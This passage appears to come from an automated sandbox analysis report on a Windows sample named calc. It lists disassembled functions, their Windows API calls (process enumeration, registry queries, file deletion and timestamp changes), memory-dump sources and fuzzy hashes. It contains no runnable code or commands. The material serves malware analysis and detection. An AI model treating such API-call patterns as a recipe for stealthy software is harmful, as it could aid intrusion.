    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend$CtrlFocus$Child
    • String ID: 0
    • API String ID: 155916262-4108050209
    • Opcode ID: d990ddb02262e76da551cf043bd84009251360777e327b3fa7c4ebf42c808ac8
    • Instruction ID: f2e533566926b18452da6f46fbe18385ad865f3593145e1545aacff08ac70125
    • Opcode Fuzzy Hash: d990ddb02262e76da551cf043bd84009251360777e327b3fa7c4ebf42c808ac8
    • Instruction Fuzzy Hash: D5215C72D00248FFDB12AFA48C44AAE7FB8EB45344F14807AF814B3291D3389D199B64
    Function 00456097 Relevance: 16.8, APIs: 11, Instructions: 309COMMON
    Download Yara Rule
    APIs
    • LCMapStringW.KERNEL32(00000000,00000100,00462758,00000001,00000000,00000000,0045C448,0000003C,00456CFA,?,00000100,00000000,00000001,?,00000003,?), ref: 004560BE
    • GetLastError.KERNEL32(?,?,00456071,?,00000000,00000000,?,00000000,?,?,0040EF80,?,00000000,00000001,00479BD8,00000000), ref: 004560D0
    • MultiByteToWideChar.KERNEL32(?,00000000,00000001,00000000,00000000,00000000,0045C448,0000003C,00456CFA,?,00000100,00000000,00000001,?,00000003,?), ref: 00456157
    • MultiByteToWideChar.KERNEL32(?,00000001,00000001,00000000,0040EF80,00000000,?,?,00456071,?,00000000,00000000,?,00000000), ref: 004561D8
    • LCMapStringW.KERNEL32(00000000,00479BD8,0040EF80,00000000,00000000,00000000,?,?,00456071,?,00000000,00000000,?,00000000), ref: 004561F2
    • LCMapStringW.KERNEL32(00000000,00479BD8,0040EF80,00000000,?,0040EF80,?,?,00456071,?,00000000,00000000,?,00000000), ref: 0045622D
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: String$ByteCharMultiWide$ErrorLast
    • String ID:
    • API String ID: 1775797328-0
    • Opcode ID: a0ecc1ffbf343fcb75b06f3056c9004a189bf43254338daf07d592b7a9ac0ace
    • Instruction ID: b2d8dc44d8ca8eb0f0711e217ba9cf18ae384d9cb4d0d13082bcb19e82ea283e
    • Opcode Fuzzy Hash: a0ecc1ffbf343fcb75b06f3056c9004a189bf43254338daf07d592b7a9ac0ace
    • Instruction Fuzzy Hash: 84B1AA7280021AEFDF119FA0CC858EF7BB5FB0831AF55422AF915A3262D3398D55DB58
    Function 00414777 Relevance: 16.7, APIs: 11, Instructions: 163COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 004163E7: LoadLibraryA.KERNEL32(Psapi.dll,004147A2,00000000,74DF0F00,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,00B40F38,00479E08), ref: 004163F2
      • Part of subcall function 004163E7: GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00416404
    • FreeLibrary.KERNEL32(00000000,00000000,74DF0F00,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,00B40F38,00479E08), ref: 00414969
      • Part of subcall function 0041640E: LoadLibraryA.KERNEL32(Psapi.dll,004147B9,00000000,74DF0F00,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,00B40F38,00479E08), ref: 00416419
      • Part of subcall function 0041640E: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0041642B
    • FreeLibrary.KERNEL32(00000000,00000000,74DF0F00,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,00B40F38,00479E08), ref: 0041495E
      • Part of subcall function 00416435: LoadLibraryA.KERNEL32(Psapi.dll,004147CB,00000000,74DF0F00,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,00B40F38,00479E08), ref: 00416440
      • Part of subcall function 00416435: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00416452
    • FreeLibrary.KERNEL32(00479E08,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,00B40F38,00479E08), ref: 004147FE
    • FreeLibrary.KERNEL32(00000000,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,00B40F38,00479E08), ref: 00414809
    • FreeLibrary.KERNEL32(00000000,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,00B40F38,00479E08), ref: 00414818
    • OpenProcess.KERNEL32(00000410,00000000,?,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,00B40F38,00479E08), ref: 0041485C
    • CloseHandle.KERNEL32(00420411,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,00B40F38,00479E08), ref: 0041490F
    • FreeLibrary.KERNEL32(00479E08,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,00B40F38,00479E08), ref: 00414931
    • FreeLibrary.KERNEL32(0042018E,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,00B40F38,00479E08), ref: 0041493B
    • FreeLibrary.KERNEL32(00000000,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,00B40F38,00479E08), ref: 00414945
    • FreeLibrary.KERNEL32(00479E08,00000000,74DF0F00,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,00B40F38,00479E08), ref: 00414953
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Library$Free$AddressLoadProc$CloseHandleOpenProcess
    • String ID:
    • API String ID: 3454388078-0
    • Opcode ID: 8575cd75629cd14a94a79052e0b0246a4dd23e3a31068d55498de8c76bb20fe6
    • Instruction ID: 67da03c55051d6841422090956ccbf622c4eb7ad81aeaa5aa04e5421710b268f
    • Opcode Fuzzy Hash: 8575cd75629cd14a94a79052e0b0246a4dd23e3a31068d55498de8c76bb20fe6
    • Instruction Fuzzy Hash: 765129B1C1022DEBDF12ABA5DC40AEFBBB8BF88315F140167E510B2150D7789A85DF98
    Function 00453588 Relevance: 16.6, APIs: 11, Instructions: 150COMMON
    Download Yara Rule
    APIs
    • GetEnvironmentStringsW.KERNEL32(74DF0A60,00000000,?,?,?,?,0044BFAC,?,0045B1B8,00000060), ref: 004535A3
    • GetLastError.KERNEL32(?,?,?,?,0044BFAC,?,0045B1B8,00000060), ref: 004535B7
    • GetEnvironmentStringsW.KERNEL32(74DF0A60,00000000,?,?,?,?,0044BFAC,?,0045B1B8,00000060), ref: 004535DA
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00453614
    • GetEnvironmentStrings.KERNEL32(74DF0A60,00000000,?,?,?,?,0044BFAC,?,0045B1B8,00000060), ref: 00453637
    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,000000FF,00000000,00000000,?,?,?,?,0044BFAC,?,0045B1B8,00000060), ref: 00453652
    • _strlen.LIBCMT ref: 0045365F
    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,000000FF,00000000,?,?,?,?,?,0044BFAC,?,0045B1B8,00000060), ref: 004536A3
    • _strlen.LIBCMT ref: 004536AE
    • FreeEnvironmentStringsA.KERNEL32(00000000,?,?,?,?,0044BFAC,?,0045B1B8,00000060), ref: 004536CB
    • FreeEnvironmentStringsA.KERNEL32(00000000,?,?,?,?,0044BFAC,?,0045B1B8,00000060), ref: 004536E7
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: EnvironmentStrings$Free$ByteCharMultiWide_strlen$ErrorLast
    • String ID:
    • API String ID: 871561937-0
    • Opcode ID: 21812873986489fbe99715ba7c627e1b80cc0d82144691c4f57707a5aec04b32
    • Instruction ID: 189182811b8b7028e3f3fa76c12f55b7742606a7d7476da671c1c8c24d5278b9
    • Opcode Fuzzy Hash: 21812873986489fbe99715ba7c627e1b80cc0d82144691c4f57707a5aec04b32
    • Instruction Fuzzy Hash: 63411572508255BFD7306F249C8886B7798EB4439B724192FFC46C3243FB299E48D25D
    Function 00406535 Relevance: 16.6, APIs: 11, Instructions: 116COMMON
    Download Yara Rule
    APIs
    • GetSysColor.USER32(0000000F), ref: 00406559
    • 73A245F0.USER32(?,000000F0), ref: 004065A4
    • GetSysColor.USER32(00000005), ref: 004065D7
    • GetSysColor.USER32(00000005), ref: 004065FB
    • 73A26110.USER32(?), ref: 00406610
    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0040661D
    • 73A1A480.USER32(?,00000000), ref: 00406629
    • SetTextColor.GDI32(?,?), ref: 0040663C
    • SetBkMode.GDI32(00000000,00000001), ref: 0040664F
    • GetStockObject.GDI32(00000005), ref: 00406657
    • SetBkColor.GDI32(?,00000000), ref: 00406664
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Color$A245A26110A480ModeObjectPixelStockText
    • String ID:
    • API String ID: 1719222219-0
    • Opcode ID: f119085c45a49c7da0f7156818a14affc38ae8097efda252f98faf3e6f8f3136
    • Instruction ID: cffc45891000b0bcc1ff650ca7b895da0922e0ac8dd974e18ebca7e1b207af5a
    • Opcode Fuzzy Hash: f119085c45a49c7da0f7156818a14affc38ae8097efda252f98faf3e6f8f3136
    • Instruction Fuzzy Hash: FA41E830104355BBDB345F289C5876E3B959F05321F16053BF563612E6DB3ACC669B0A
    Function 00442E86 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 236fileCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 004168A2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0045C6D0,?,?,?,00442C32,00000000,0045C6D0), ref: 004168CE
      • Part of subcall function 004168A2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00442C32,00000000,0045C6D0), ref: 004168F0
    • _strcat.LIBCMT ref: 00442EB7
    • _strcat.LIBCMT ref: 00442EC4
    • DeleteFileA.KERNEL32(?), ref: 00443140
      • Part of subcall function 0044341F: CreateFileA.KERNEL32(00000003,40000000,00000001,00000000,00000003,00000080,00000000,00000000,0044315A,?,?,?), ref: 00443436
      • Part of subcall function 0044341F: SetFileTime.KERNEL32(00000000,?,00000000,?), ref: 0044344E
      • Part of subcall function 0044341F: CloseHandle.KERNEL32(00000000), ref: 00443455
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: File$ByteCharMultiWide_strcat$CloseCreateDeleteHandleTime
    • String ID: {QB
    • API String ID: 896891539-2627146250
    • Opcode ID: 6988c0bdf422c823a9d550167b0ddf15080c70edee494b47ff06e7fd9cc4bfc2
    • Instruction ID: 10c7d94db973383b35a21a2cb43c7254eeebb8db6f0dbf89339a4b2e7f1b655e
    • Opcode Fuzzy Hash: 6988c0bdf422c823a9d550167b0ddf15080c70edee494b47ff06e7fd9cc4bfc2
    • Instruction Fuzzy Hash: 4D815F72810118AAEF21EFA1CC45FDEB7BCAF44715F00459AF604E6141E778AB94CB6A
    Function 00431897 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 223COMMON
    Download Yara Rule
    APIs
    • VariantInit.OLEAUT32(?), ref: 004319A8
    • VariantInit.OLEAUT32(DC), ref: 00431A82
    • VariantClear.OLEAUT32(DC), ref: 00431A92
    • VariantClear.OLEAUT32(00000001), ref: 00431AEA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Variant$ClearInit
    • String ID: DC$DC$F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
    • API String ID: 2610073882-2016888648
    • Opcode ID: d5ac6c7435a118f372d55c3238acd3d38c9c150783125d6d9ec619cbb2707b80
    • Instruction ID: 8083f426d9f894f1bc40dfaa809b4d26ab45a09ced0e321bccf615fb93141159
    • Opcode Fuzzy Hash: d5ac6c7435a118f372d55c3238acd3d38c9c150783125d6d9ec619cbb2707b80
    • Instruction Fuzzy Hash: 89817C71900209ABCF20DFE5CC84EEEB7B8AF08315F10456EF515A72A1D7B89E45CB69
    Function 00414C46 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 171COMMON
    Download Yara Rule
    APIs
    • 74D415C0.VERSION(?,?), ref: 00414C54
    • 74D415E0.VERSION(?,00000000,00000000,00000000,?,?,?,?), ref: 00414C79
    • 74D41560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?,?,?), ref: 00414CDA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: D415$D41560
    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
    • API String ID: 2785092254-1459072770
    • Opcode ID: 53a68b45b3447496075947185f7015a20a69511d9af66c69ec2f3265c8401311
    • Instruction ID: b540cfc319d4a38a51c032714b70e1d9c6a701d3d0a690d825f71a9fdec0b216
    • Opcode Fuzzy Hash: 53a68b45b3447496075947185f7015a20a69511d9af66c69ec2f3265c8401311
    • Instruction Fuzzy Hash: 6E41D571900205BAFF25BB619C82DFF776CEF41728B10006FFC05A6182EB3D9E05A669
    Function 0040ACC4 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 110windowCOMMON
    Download Yara Rule
    APIs
    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,000000FF,000000FF,000000FF,static,00000000,00000000,?,?,00000000), ref: 0040AD6A
    • 73A24C40.GDI32(00000000), ref: 0040AD84
    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0040AD95
    • SelectObject.GDI32(00000000,00000000), ref: 0040AD9D
    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0040ADA6
    • DeleteDC.GDI32(00000000), ref: 0040ADAF
    • 73A245F0.USER32(?,000000EC), ref: 0040ADBC
    • FreeLibrary.KERNEL32(?), ref: 0040ADE1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: A245DeleteFreeLibraryMessageMoveObjectPixelSelectSendWindow
    • String ID: static
    • API String ID: 3237436995-2160076837
    • Opcode ID: 5f72c1e398458f8ac8b8143ce220c834d1682bb7dd6da2bd07dc19b79781713a
    • Instruction ID: 442ddf80c400d9d32d76eed9ab16b74343115a2bd9ff294ad75a3f3526e7d052
    • Opcode Fuzzy Hash: 5f72c1e398458f8ac8b8143ce220c834d1682bb7dd6da2bd07dc19b79781713a
    • Instruction Fuzzy Hash: 76415B31400208EFCF219FA5DC48DDB3BB9EF89326B10422AF915A21A1C7388D61DB69
    Function 00408346 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 94windowCOMMON
    Download Yara Rule
    APIs
    • 73A25CF0.USER32(?,?), ref: 004083AC
    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 004083DA
    • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004083F8
    • GetDesktopWindow.USER32 ref: 00408401
    • GetWindowRect.USER32(00000000), ref: 00408408
    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00408419
    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0040842D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSendWindow$CreateDesktopRect
    • String ID: ,$tooltips_class32
    • API String ID: 1032049750-3856767331
    • Opcode ID: 9b8121fc188cf288ac9b5b5fef6ff443b3dc8ee524fe8ba7451b8fdb6dbb4574
    • Instruction ID: fe07c1e0de863ff4ca3345fb0f8a85e63066fb8b723ce0ea5c7ea8cd899b1c6a
    • Opcode Fuzzy Hash: 9b8121fc188cf288ac9b5b5fef6ff443b3dc8ee524fe8ba7451b8fdb6dbb4574
    • Instruction Fuzzy Hash: 95315CB2600309BFDB11DFA8DD85EAA7BB8FB08311F104429FA45E3251D775ED148B64
    Function 00402257 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 83windowCOMMON
    Download Yara Rule
    APIs
    • SendMessageW.USER32(?,0000018C,00000001,00000002), ref: 004022E9
    • GetDlgCtrlID.USER32(00000000), ref: 004022FA
    • GetParent.USER32 ref: 0040230C
    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00402313
    • GetDlgCtrlID.USER32(00000000), ref: 00402319
    • GetParent.USER32 ref: 0040232F
    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00402336
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend$CtrlParent
    • String ID: ComboBox$ListBox
    • API String ID: 1383977212-1403004172
    • Opcode ID: b4c6847ddb954c57b532f90e0b59cf810200ac53788e72ad7a38262deb32b772
    • Instruction ID: 21d4efe765151b58f1e8dd2b8bd2338c310614b799d46b9de95d0ec11e15162d
    • Opcode Fuzzy Hash: b4c6847ddb954c57b532f90e0b59cf810200ac53788e72ad7a38262deb32b772
    • Instruction Fuzzy Hash: 8521D871904318BBDF119BB5CC49BBE7BA8DF05311F1000AAF501BB1E2C6BD9D459B69
    Function 0040205D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
    Download Yara Rule
    APIs
    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004020ED
    • GetDlgCtrlID.USER32(00000000), ref: 004020FE
    • GetParent.USER32 ref: 00402110
    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00402117
    • GetDlgCtrlID.USER32(00000000), ref: 0040211D
    • GetParent.USER32 ref: 00402133
    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0040213A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend$CtrlParent
    • String ID: ComboBox$ListBox
    • API String ID: 1383977212-1403004172
    • Opcode ID: 124539691f61301ecab7ed6bfae124bb79b9e1a3c2a3c374eab3d836ef2cf37b
    • Instruction ID: 1ae3639546ccadbcf58f9fd73665429625f42c9a5e242655649765a7bb30241d
    • Opcode Fuzzy Hash: 124539691f61301ecab7ed6bfae124bb79b9e1a3c2a3c374eab3d836ef2cf37b
    • Instruction Fuzzy Hash: 7121F871900318BBDF11AB69CC49BBE7BA8DF05311F1000A6F601BB1E2C6BD9D49DB69
    Function 0043B8ED Relevance: 15.3, APIs: 10, Instructions: 297registryCOMMON
    Download Yara Rule
    APIs
    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0043B992
    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,?,?,?,HKCR\), ref: 0043B9BC
    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,HKCR\), ref: 0043B9CE
    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,?,?,?,?,?,HKCR\), ref: 0043BA0C
    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,0001FFFE,00000000,?,?,?,?,?), ref: 0043BA8A
    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,?,?,HKCR\), ref: 0043BB16
    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,0000FFFF,00000000,?,?,?,?,?), ref: 0043BB70
    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,0001FFFE,00000000,?,?,?,?,?), ref: 0043BBE6
    • RegCloseKey.ADVAPI32(?,00000000,00000000,?,?,?,?,?,HKCR\), ref: 0043BC25
    • RegCloseKey.ADVAPI32(?), ref: 0043BC30
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: QueryValue$Close$ConnectOpenRegistry
    • String ID:
    • API String ID: 1162896230-0
    • Opcode ID: ee53909dafedda49c7e096914cac79287886743007e2b3f346685ad29a373c7f
    • Instruction ID: 50d668c21b230dfb2cab80434d9b6aad851b21af5472c1ebae7558954520c36c
    • Opcode Fuzzy Hash: ee53909dafedda49c7e096914cac79287886743007e2b3f346685ad29a373c7f
    • Instruction Fuzzy Hash: 15B17471900119EBDF20EF95DC81BEEB7B8EF08314F14505BEA05A7251DB38AE45DB98
    Function 0042AD12 Relevance: 15.3, APIs: 10, Instructions: 278COMMON
    Download Yara Rule
    APIs
